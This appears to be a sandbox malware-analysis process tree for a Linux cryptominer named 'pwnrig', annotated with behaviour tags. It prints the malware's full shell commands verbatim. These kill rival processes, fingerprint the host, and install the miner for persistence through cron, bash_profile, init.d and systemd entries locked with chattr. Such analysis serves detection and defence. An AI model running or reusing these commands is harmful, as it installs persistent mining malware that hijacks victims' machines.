/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:2054
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵PID:2056
-
-
/usr/bin/psps -A "-ostat,ppid"4⤵
- Reads CPU attributes
PID:2055
-
-
/usr/bin/idid -u4⤵PID:2058
-
-
/usr/bin/grepgrep -v grep4⤵PID:2061
-
-
/usr/bin/grepgrep /etc/cron4⤵PID:2060
-
-
/usr/bin/psps x4⤵PID:2059
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
- Security Software Discovery
PID:2063 -
/usr/bin/idid -u4⤵PID:2064
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵PID:2069
-
-
/usr/bin/grepgrep -v /usr/sbin/httpd4⤵PID:2068
-
-
/usr/bin/grepgrep -v -- "-bash[[:space:]]*\$"4⤵PID:2067
-
-
/usr/bin/grepgrep -v grep4⤵PID:2066
-
-
/usr/bin/psps aux4⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:2065
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"3⤵
- Security Software Discovery
PID:2071 -
/usr/bin/idid -u4⤵PID:2072
-
-
/usr/bin/wcwc -l4⤵PID:2078
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵PID:2077
-
-
/usr/bin/grepgrep -- "-bash[[:space:]]*\$"4⤵PID:2076
-
-
/usr/bin/grepgrep -v grep4⤵PID:2075
-
-
/usr/bin/psps aux4⤵
- Process Discovery
- Reads runtime system information
PID:2074
-
-
-
-
/tmp/sys-helper/tmp/sys-helper2⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:2079
-
-
/usr/bin/crontabcrontab -r2⤵PID:2082
-
-
/usr/bin/pkillpkill -f .klibsystem52⤵
- Reads CPU attributes
PID:2083
-
-
/usr/bin/pkillpkill -f .klibsystem42⤵
- Reads runtime system information
PID:2084
-
-
/usr/bin/bashbash -c "echo \"* * * * * /tmp/.klibsystem5 >/dev/null 2>&1\" | crontab -"2⤵PID:2085
-
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
PID:2087
-
-
-
/tmp/sys-helper/tmp/sys-helper2⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:2088
-
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:2089 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵PID:2090
-
/usr/bin/hostnamehostname -I4⤵PID:2093
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:2095
-
-
/usr/bin/awkawk "{print \"-\"\$2}"4⤵PID:2100
-
-
/usr/bin/headhead -n 14⤵PID:2099
-
-
/usr/bin/grepgrep "Port "4⤵PID:2098
-
-
/usr/bin/catcat /etc/ssh/sshd_config4⤵PID:2097
-
-
/usr/bin/whoamiwhoami4⤵PID:2101
-
-
/usr/bin/hostnamehostname4⤵PID:2102
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:2103
-
-
/usr/bin/sedsed -e "s/\$//"4⤵PID:2109
-
-
/usr/bin/sedsed -e "s/^ *//"4⤵PID:2108
-
-
/usr/bin/cutcut -d: -f24⤵PID:2107
-
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo4⤵PID:2106
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:2112
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:2115
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:2118
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:2119
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵PID:2121
-
-
/usr/bin/psps -A "-ostat,ppid"4⤵PID:2120
-
-
/usr/bin/idid -u4⤵PID:2123
-
-
/usr/bin/grepgrep -v grep4⤵PID:2126
-
-
/usr/bin/grepgrep /etc/cron4⤵PID:2125
-
-
/usr/bin/psps x4⤵
- Reads runtime system information
PID:2124
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"3⤵
- File and Directory Permissions Modification
- Writes file to tmp directory
PID:2128 -
/usr/bin/idid -u4⤵PID:2129
-
-
/usr/bin/idid -u4⤵PID:2130
-
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"4⤵PID:2131
-
-
/usr/bin/rmrm -rf /bin/bprofr4⤵PID:2132
-
-
/usr/bin/sedsed -i /bprofr/d "~/.bash_profile"4⤵PID:2133
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr4⤵
- Writes file to system bin folder
PID:2134
-
-
/usr/bin/idid -u4⤵PID:2135
-
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"4⤵PID:2136
-
-
/usr/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly4⤵PID:2137
-
-
/usr/bin/chattrchattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵PID:2138
-
-
/usr/bin/rmrm -rf /bin/crondr4⤵PID:2139
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr4⤵
- Writes file to system bin folder
PID:2140
-
-
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
PID:2142
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Attempts to change immutable files
- Creates/modifies Cron job
PID:2143
-
-
/usr/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
- File and Directory Permissions Modification
PID:2144
-
-
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵PID:2145
-
-
/usr/bin/whichwhich chkconfig4⤵PID:2146
-
-
/usr/bin/whichwhich update-rc.d4⤵PID:2147
-
-
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr4⤵
- Attempts to change immutable files
PID:2148
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable4⤵
- Flushes firewall rules
PID:2149 -
/usr/local/sbin/systemctlsystemctl --quiet disable pwnrig5⤵PID:2150
-
-
/usr/local/bin/systemctlsystemctl --quiet disable pwnrig5⤵PID:2150
-
-
/usr/sbin/systemctlsystemctl --quiet disable pwnrig5⤵PID:2150
-
-
/usr/bin/systemctlsystemctl --quiet disable pwnrig5⤵
- Reads EFI boot settings
PID:2150
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:2176
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:2176
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:2176
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Reads EFI boot settings
PID:2176
-
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove4⤵PID:2202
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:2203
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:2203
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:2203
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Reads EFI boot settings
PID:2203
-
-
-
/usr/bin/rmrm -rf /bin/initdr4⤵PID:2229
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr4⤵
- Writes file to system bin folder
PID:2230
-
-
/usr/bin/teetee /etc/init.d/pwnrig4⤵
- Modifies init.d
PID:2232
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig4⤵
- Modifies init.d
PID:2233
-
-
/usr/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr4⤵
- File and Directory Permissions Modification
PID:2234
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults4⤵PID:2235
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:2236
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:2236
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:2236
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:2236
-
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig enable4⤵PID:2262
-
/usr/local/sbin/systemctlsystemctl --quiet enable pwnrig5⤵PID:2263
-
-
/usr/local/bin/systemctlsystemctl --quiet enable pwnrig5⤵PID:2263
-
-
/usr/sbin/systemctlsystemctl --quiet enable pwnrig5⤵PID:2263
-
-
/usr/bin/systemctlsystemctl --quiet enable pwnrig5⤵PID:2263
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:2264
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:2264
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:2264
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:2264
-
-
-
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr4⤵PID:2290
-
-
/usr/bin/whichwhich systemctl4⤵PID:2291
-
-
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵PID:2292
-
-
/usr/bin/rmrm -rf /bin/sysdr4⤵PID:2293
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/sysdr4⤵
- Writes file to system bin folder
PID:2294
-
-
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
- Modifies systemd
PID:2296
-
-
/usr/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵PID:2297
-
-
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵PID:2298
-
-
/usr/bin/systemctlsystemctl enable pwnrige.service4⤵PID:2299
-
-
/usr/bin/systemctlsystemctl enable pwnrigl.service4⤵PID:2325
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵PID:2351
-
-
/usr/bin/systemctlsystemctl reload-or-restart pwnrige.service4⤵PID:2377
-
-
-
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:2434 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵PID:2458
-
/usr/bin/hostnamehostname -I4⤵PID:2461
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:2463
-
-
/usr/bin/awkawk "{print \"-\"\$2}"4⤵PID:2468
-
-
/usr/bin/headhead -n 14⤵PID:2467
-
-
/usr/bin/grepgrep "Port "4⤵PID:2466
-
-
/usr/bin/catcat /etc/ssh/sshd_config4⤵PID:2465
-
-
/usr/bin/whoamiwhoami4⤵PID:2469
-
-
/usr/bin/hostnamehostname4⤵PID:2470
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:2471
-
-
/usr/bin/sedsed -e "s/\$//"4⤵PID:2477
-
-
/usr/bin/sedsed -e "s/^ *//"4⤵PID:2476
-
-
/usr/bin/cutcut -d: -f24⤵PID:2475
-
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo4⤵PID:2474
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:2480
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:2483
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:2486
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:2487
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵PID:2489
-
-
/usr/bin/psps -A "-ostat,ppid"4⤵PID:2488
-
-
/usr/bin/idid -u4⤵PID:2491
-
-
/usr/bin/grepgrep -v grep4⤵PID:2494
-
-
/usr/bin/grepgrep /etc/cron4⤵PID:2493
-
-
/usr/bin/psps x4⤵PID:2492
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
- Security Software Discovery
PID:2496 -
/usr/bin/idid -u4⤵PID:2497
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵PID:2502
-
-
/usr/bin/grepgrep -v /usr/sbin/httpd4⤵PID:2501
-
-
/usr/bin/grepgrep -v -- "-bash[[:space:]]*\$"4⤵PID:2500
-
-
/usr/bin/grepgrep -v grep4⤵PID:2499
-
-
/usr/bin/psps aux4⤵
- Process Discovery
- Reads runtime system information
PID:2498
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"3⤵
- Security Software Discovery
PID:2504 -
/usr/bin/idid -u4⤵PID:2505
-
-
/usr/bin/wcwc -l4⤵PID:2511
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵PID:2510
-
-
/usr/bin/grepgrep -- "-bash[[:space:]]*\$"4⤵PID:2509
-
-
/usr/bin/grepgrep -v grep4⤵PID:2508
-
-
/usr/bin/psps aux4⤵
- Process Discovery
PID:2507
-
-
-
-
/usr/bin/crontabcrontab -r2⤵PID:2513
-
-
/usr/bin/pkillpkill -f .klibsystem52⤵PID:2514
-
-
/usr/bin/pkillpkill -f .klibsystem42⤵
- Reads runtime system information
PID:2515
-
-
/usr/bin/bashbash -c "echo \"* * * * * /home/.klibsystem5 >/dev/null 2>&1\" | crontab -"2⤵PID:2516
-
/usr/bin/crontabcrontab -3⤵PID:2518
-
-
-
/usr/bin/chattrchattr -ia /etc/cron.d/.lib-knlib42⤵PID:2519
-
-
/usr/bin/chattrchattr +ia /etc/cron.d/.lib-knlib42⤵PID:2520
-
-
/usr/bin/chattrchattr -ia /var/spool/cron/.lib-knlib42⤵PID:2521
-
-
/usr/bin/chattrchattr +ia /var/spool/cron/.lib-knlib42⤵PID:2522
-
-
/usr/bin/chattrchattr -ia /etc/cron.hourly/.lib-knlib42⤵PID:2523
-
-
/usr/bin/chattrchattr +ia /etc/cron.hourly/.lib-knlib42⤵PID:2524
-
-
/usr/bin/chattrchattr -ia /etc/cron.daily/.lib-knlib42⤵PID:2525
-
-
/usr/bin/chattrchattr +ia /etc/cron.daily/.lib-knlib42⤵PID:2526
-
-
/usr/bin/chattrchattr -ia /etc/cron.weekly/.lib-knlib42⤵PID:2527
-
-
/usr/bin/chattrchattr +ia /etc/cron.weekly/.lib-knlib42⤵PID:2528
-
-
/usr/bin/chattrchattr -ia /etc/cron.monthly/.lib-knlib42⤵
- Attempts to change immutable files
PID:2529
-
-
/usr/bin/chattrchattr +ia /etc/cron.monthly/.lib-knlib42⤵PID:2530
-
-
/usr/bin/chattrchattr -ia /etc/anacrontab2⤵PID:2531
-
-
/usr/bin/chattrchattr +ia /etc/anacrontab2⤵PID:2532
-
-
/tmp/sys-helper/tmp/sys-helper2⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:2533
